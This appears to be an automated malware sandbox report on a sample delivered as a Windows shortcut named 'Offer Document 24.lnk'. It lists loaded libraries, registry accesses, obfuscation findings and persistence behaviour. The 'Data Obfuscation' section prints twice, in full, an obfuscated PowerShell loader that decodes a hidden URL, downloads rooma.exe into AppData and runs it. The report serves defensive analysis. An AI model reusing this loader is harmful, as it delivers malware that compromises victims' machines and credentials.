Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rooma.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: Offer Document 24.lnk LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509569142.000000000093E000.00000002.00000001.01000000.0000000F.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3835791567.000000000093E000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: wntdll.pdbUGP source: rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rooma.exe, rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs; Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4A342DEB push ecx; rep ret 5_2_00007FFB4A342DEC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B48A9 push esp; ret 7_2_009B48AA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009CE2BA push 00000038h; iretd 7_2_009CE2BE
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C8C92 pushad ; retf 7_2_009C8C93
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009CA436 push ebx; iretd 7_2_009CA600
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009CA5D9 push ebx; iretd 7_2_009CA600
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B3780 push eax; ret 7_2_009B3782
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C47A2 push es; iretd 7_2_009C47AA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B17E5 push ebp; retf 003Fh 7_2_009B17E6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015909AD push ecx; mov dword ptr [esp], ecx 7_2_015909B6
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AC9E05 push esp; ret 9_2_04AC9E06
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AE3816 push 00000038h; iretd 9_2_04AE381A
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADF992 push ebx; iretd 9_2_04ADFB5C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADE1EE pushad ; retf 9_2_04ADE1EF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADDB88 push ebx; ret 9_2_04ADDB89
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AE8BD4 push FFFFFFBAh; ret 9_2_04AE8BD6
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADFB35 push ebx; iretd 9_2_04ADFB5C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EE09AD push ecx; mov dword ptr [esp], ecx 10_2_02EE09B6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02562238 pushad ; iretd 10_2_02562239
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256101F push es; iretd 10_2_02561027
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02551126 push esp; ret 10_2_02551127
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256D1B0 push es; ret 10_2_0256D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256550F pushad ; retf 10_2_02565510
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256AB37 push 00000038h; iretd 10_2_0256AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02566E56 push ebx; iretd 10_2_02566E7D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256FEF5 push FFFFFFBAh; ret 10_2_0256FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02560EAB push ebp; retf 10_2_02560EAC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0255FFA0 push esi; iretd 10_2_0255FFA5
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02566CB3 push ebx; iretd 10_2_02566E7D
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023A7A15 push eax; retf 14_2_023A7A14
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023B2A5A push esi; iretd 14_2_023B2A5F
Source: rooma.exe.5.dr Static PE information: section name: .text entropy: 7.994482090735877

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\rooma.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
